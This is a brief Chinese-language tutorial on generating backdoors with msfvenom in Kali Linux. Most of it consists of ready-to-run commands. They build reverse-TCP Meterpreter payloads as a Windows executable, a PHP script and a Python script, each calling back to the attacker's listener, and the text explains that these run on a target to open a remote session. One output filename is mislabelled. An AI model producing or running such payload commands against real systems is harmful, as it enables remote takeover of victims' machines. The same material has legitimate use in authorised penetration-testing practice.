msfvenom 生成

运行前提:

kali 操作系统中

运行权限为 root 用户 (用 sudo su 命令 切换到root )

root 根目录下进行输入 msfvenom

1.msfvenom

msfvenom 是 msfpayload 和 msfencode 的组合。将这两个工具集成在一个框架实例中

**进一步解释 ** : msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

2.生成后门

#msfvenom 在bash shell 里使用,不是msf 终端

msfvenom -h //调出help

下面是几个执行模板

//windows 可执行程序后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f exe >shell.exe

// 载荷 :  系统/架构/作用/方式  

例子: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=2333 -f exe>shell.exe

//php 脚本后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f raw >shell.exe

//python 脚本后门

msfvenom -p python/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f raw >shell.py

-p 使用什么样的攻击载荷

-f 输出什么样的格式 exe

生成木马成功后,从虚拟机移到真实机测试 –> 木马被删除,生成成功 =。=